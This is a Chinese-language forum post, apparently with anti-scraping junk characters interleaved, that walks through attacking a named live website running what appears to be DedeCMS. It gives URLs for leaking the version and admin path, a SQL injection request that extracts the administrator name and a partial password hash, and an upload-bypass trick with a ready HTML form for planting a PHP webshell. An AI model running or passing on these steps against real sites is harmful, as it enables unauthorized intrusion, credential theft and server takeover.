①注入漏洞。" E8 W% |7 D+ E# q
这站 http://www.political-security.com/, i* `; k* v6 G6 F+ w! k* e( F
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
+ D1 C$ Q0 e/ [. ?4 d- Mwww.political-security.com/data/mysql_error_trace.inc 爆后台
" q5 H7 P- @7 t- y- e然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
+ s+ j v0 Y: z; a* i然后写上语句 % t$ _" @% H; ?9 O
查看管理员帐号3 A c. S, Y7 _1 Q
http://www.political-security.co ... &membergroup=@`
& w5 s. S1 S1 n. G: s
/ P! Q/ S6 f6 ^7 O9 eadmin
5 E: ~7 V9 p$ \
) Q" O3 X- P, b8 q查看管理员密码
Z. X4 M0 f2 p6 D9 j0 ` http://www.political-security.co ... &membergroup=@`! u, J! `& k Y' @& D! x
. M. |, {. }) f! ]2 s, A8d29b1ef9f8c5a5af429
w& K4 p) r- ]6 W7 P% j, a" U. l, V; ]4 N5 O7 s
查看管理员密码
" e$ R8 a5 D5 Z. b* p& F/ R/ w) }
: a2 c, r, u" s, Q F得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD52 |" |, i+ y2 m& l/ d5 u
! G1 J: }7 ^8 W( b! P, h8d2( a1 Z! L2 q F: S
9b1ef9f8c5a5af42% i$ S* s0 m- U# l- I; ~5 L
9
) k: }2 e2 G3 k' z2 } L' W% ?9 D9 k- b# D
cmd5没解出来 只好测试第二个方法# R b1 ~ Y" R: s4 p( S
3 q5 `% F9 X/ j' D( E6 o# Y1 F/ s) {, @' ?% V$ ^! w$ z
②上传漏洞:
, P) }& M, n7 `/ D5 n3 i
; Y! A$ j# _, E% V* @$ {# N只要登陆会员中心,然后访问页面链接9 N: b2 D3 I' K [# R' u- g# I5 K
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”2 G, J6 K% G) j0 z/ E, H7 e
4 M. @2 @8 @/ o+ _如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
1 {/ e5 K' R, ?2 t1 Z' j3 e) l2 z1 f" N& s
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm/ I, G' r! P% ~ q; e& g
% [' }' H# T- d) P4 b( n<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>/ T5 U3 L; H: q- y2 ]# u( D
或者
2 R3 h; C/ ] a即可上传成功 |